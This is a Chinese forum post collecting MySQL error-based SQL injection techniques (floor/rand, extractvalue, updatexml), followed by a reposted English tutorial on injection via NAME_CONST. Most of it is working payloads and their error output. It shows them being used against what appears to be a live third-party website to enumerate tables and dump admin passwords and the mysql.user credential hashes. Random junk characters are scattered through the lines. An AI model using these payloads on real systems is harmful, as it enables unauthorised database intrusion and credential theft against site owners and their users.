|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:' h# p' Z- X7 F$ p+ c- e C. h
首先进行正常查询: mysql> select * from article where id = 1;
! i; E+ d4 E% n2 T$ L6 Y- s+—-+——-+———+
) \* L# H2 M: `3 j: A| id | title | content |/ g4 s; v! W. U& H+ d6 F& @$ z
+—-+——-+———+- I5 L) Q ^' `: R% O* d
| 1 | test | do it |2 z* u4 \& i. O/ ^
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);6 ]$ w0 B: v8 o: u+ V
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。. Q, Q$ B- L2 R
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
) q' K) [0 i+ _& `# i/ \ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));9 g6 }! {2 o: [1 V; i4 ]
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue+ T: u) k8 w& R3 N0 x) x) D- Q
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
' q! N. M+ |2 V7 LERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ + `; u' N. ~ D9 Q8 P; {
$ N- f; d# w+ e* H; c/ f再收集:
. B$ A% S$ W) U0 F2 Phttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 7 N5 J; i" f% H) g8 o5 S
0 x- K$ F- E4 \8 cError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
' q2 D4 c# Q+ Z& y/ p c# P5 F9 A9 c7 Y
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
% E7 Q0 I7 |1 Z' J' l1 Y# q! `# {) w( V r) G
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ % Y7 m% ^" ^) k* F% o
/ w8 g' O/ }2 u1 |! k# u: M4 G
MYSQL高版本报错注入技巧-利用NAME_CONST注入
$ i" S; ?& E/ jIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 2 g, W5 `6 n3 B* _9 c
' u0 V1 C. s1 o) i9 s
. }. D7 z0 Z6 A6 l相关信息
0 O/ \6 X4 u0 J! N, ^( d3 O d) T. I9 p3 @& I4 W4 }* S5 T
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
+ M+ s2 h; k7 k' |8 Y/ O2 W& D: o" f9 q
Code:
% w, q0 F4 C D! ]' i: ]% S0 ]) vNAME_CONST(DATA, VALUE)
' S8 P; }" {* q; n& ]4 p) O0 ]% o% A3 h6 L. ]
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.5 r0 E; M$ Z2 K# C' j8 b6 z
" Q- A. C) Y5 j5 s: W0 f9 l- X
SELECT NAME_CONST('TEST', 1)" B H! a* x: O/ p2 w
; h+ _( g4 N: M6 q$ m2 M
; X7 }. i- ?, m# R2 _$ l3 }
4 _8 ?0 E' Y. G" f( ?# i7 [|---------------|
5 H5 B, R `- U9 N D8 _| TEST |
{, Y* I B8 `! E- t4 w| |
# O% F0 w- a( l6 ?% ]4 w e D|---------------|
# w; S) o6 U+ o* J- L| 1 |) F% {, C, h: d% S- [. V' `5 R! u' r
| |
1 i* S% F; o& z9 v; X2 B|---------------|* `8 c8 k1 h7 L0 n
$ c1 ]/ ~8 L- {3 M3 @' F! S; ?- v* w* X" n4 S% d$ F9 w
$ C! A7 j1 L7 B9 _
" d" y; @- J. I) L: j0 f
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
% X* u; z2 V& l$ ?- L) mIntro to MySQL Variables! w |! H/ U3 n+ G- k+ [5 y* |
4 p3 X9 T1 V0 V! e) m; ROnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.2 P# X$ ^5 y3 D: z( S- E4 P# R
5 `4 J+ S) E3 sCode:- W0 C' g5 @1 A9 H0 i% X) U
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261% ^+ d6 k; [6 r! T& R( G0 e
/ Y; m3 D) H1 }7 ?9 f. q
* P2 b$ w) w8 u, G
2 R% T) J2 J/ f& x9 ^
0 T9 w. I' M- \3 M0 Q; L# W \: p0 J/ L+ L0 B1 p5 P
Code:
, P* x2 S2 g, D7 l/ G) }6 o! l kand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--8 Z! D, V* o+ b6 w7 s O6 h/ A
/ K) D6 f q+ i1 p! \% ?3 {0 A# f7 |# f9 r
VAR = Your MySQL variable.
8 B. i: a+ }: O. N$ s: p4 f5 f* O* H7 {- S9 ?
MySQL 5.1.3 Server System Variables
: U# e' B m1 z5 D Q1 [) y4 T& H2 f; ~" M, b7 o
Let's try it out on my site..
" O& J) y9 w" M9 _7 _* ?9 D5 h0 ] R7 Z T, m
Code:% t: Q( t7 j" u5 l4 t& }# F- U/ O6 E
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--3 H T/ d7 D( Q- ?
% N* l+ X& n2 k
Erroruplicate column name '5.0.27-community-nt'
, L9 Q3 n5 ^- o
6 ]) P3 `) x1 ~, r8 C2 \8 K+ z* q4 }6 E' m0 g7 ]( S/ x- b* J
. e, Q, Y6 w( F7 E# Y
( i* ]# o0 E6 g
6 f8 i" Y, R5 G3 w: [6 ^6 T. W( D
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
( D! Y; y5 h! ?$ t/ j+ h8 v1 m* S) Y; C" _ U9 r, w
Data Extraction
) \+ g( h$ g) u: }% ~2 f4 O, u3 x* ?! l. [' T6 X
Code:, B9 j1 K, d6 }+ M2 M! h
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
9 |5 W4 E: H* P
+ O! @8 D9 P" E% y! c4 ?$ T/ a; Y4 f3 p! {# }
We should get a duplicate column 1 error...
4 e9 L6 v& [! O6 F0 o( ` b* ~& M7 d, [( l9 f/ M/ }5 v* R5 W
Code:0 h$ G' \/ A* ~9 |( i; j
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
* T1 w: ?; j5 E; w3 U2 g9 V2 F* D- Z7 C& {+ ~2 o: k
Erroruplicate column name '1: o Y+ ]& I" E0 n
" A9 }1 V( S8 S6 O: j4 x8 G" q7 `( I* n+ ^6 U3 }8 `
+ R+ U5 E% C, ]; \, j$ y7 g4 z
3 r( A+ J3 F9 e M- e
% n3 \$ S3 r' A6 {- w
* z, }+ G. c5 `" s: x( F2 VNow let's get the tables out this bitch..
: }" z+ b! B+ T( [: G7 ~- q% s% z9 @& G. A% G# G
Code:
+ E& Y- n6 \' P& i/ m- u- l+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
, u, v. w3 H. P& `/ }) l: Y8 }% E. ~: y% q! m; ^
% i$ u1 ~$ O* F8 ` uLet's see if it works here, if it does, we can go on and finish the job.4 z' U% G1 a% v, {! w. F
" X+ Z- ?3 J3 g! i3 Q. u, L/ LCode:9 s& z1 j0 P N( x" B. f0 k/ z' m
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
8 [+ r o& w K# N# y
/ M c2 q6 y, i1 G) l+ Z9 [$ @# u; l' _& H$ T ^) _
Erroruplicate column name 'com_admanage
5 V' P1 D$ u N' U; E- s
* q8 b0 o/ O$ E7 u/ o2 _* n4 a
* Q7 t- F2 M5 k) r% E3 H# U9 U5 T" w+ F! x5 t: `1 U- B
/ ^3 d& ]) G% _
- Y1 S! J% s3 t h5 L% F0 H. w
( ]/ r- W* M, G) E- xNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
- ^7 W) J; H) }4 j" e7 G
+ e3 C% f" c8 b) H _+ m. lLet's get the columns out of the user table..
2 k: V: f' i% t7 Q2 T: Z: Q3 @: W7 j% y: j6 F7 f$ w# \
Code:
9 K# G9 C# a6 q" M' y+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
* l; g- f4 |( p: C( r$ F) Y
3 X0 G" H. F$ O7 E( c; Y( B8 b% w6 n3 a( \
So mine looks like this, and I get the duplicate column name 'Host'.
% E$ E" b* i; y3 O
+ ~4 E2 c' i4 {! L+ C9 `Code:
9 w0 R1 k* N' ?) N( nhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
$ R4 d# p8 V1 J8 W: |' [7 }- }9 j
, f% E) x8 _ O7 K# g% B5 LErroruplicate column name 'Host'. f' k. Z$ K: v. m+ C+ o- N8 N
* C& G+ s l) R! D# s) Z
2 E4 T3 |. R, d. N" d7 F
. M8 \1 E; k' e5 \1 f
9 `% f- ]1 |& C, \6 ^
$ l& T' C/ p. F: J9 ^
0 k8 U. l. v0 E5 k. u$ T" ]Woot, time to finish this bitch off.
, P2 S' d. c' [0 e! e, Q4 B$ @
3 b; l" N, W& I! v; E9 ?7 U1 PCode:
4 v+ k" ~5 z) ]- q. e1 {( W6 T+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
' i* J1 S+ I8 }$ K$ b! w6 l0 k4 o0 @+ x
% a& [/ X, q- S+ T% h' U
So mine looks like this...
' u5 h0 } s7 b* P" s& a# \8 l+ I% q8 B2 L- v. i* K
Code:4 {+ B3 j$ B" M& v/ q0 E5 G
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
2 u4 @; D& s# k
6 ?& k$ f A. Q. ~. a6 cErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'1 D& g% Q! [4 I4 `7 J2 p0 p/ g
. `( B( @- k) a# \; b
! y9 D6 h; i. `& T3 u
8 x0 o, H& d l! A) b) |' L3 K
5 L, ^2 D9 a2 t) j2 d' m. e) n0 V% b0 d m6 t$ j+ U' a
' b `3 i' \ a3 _And there we have it, thanks for reading.+ a# ~, J; L4 G+ B* ?$ S% Q* i
2 x; p+ ?3 C! s$ Z2 x9 S; D+ w8 U# C m
|
发表于 2015-11-11 19:03:37
收藏
支持
反对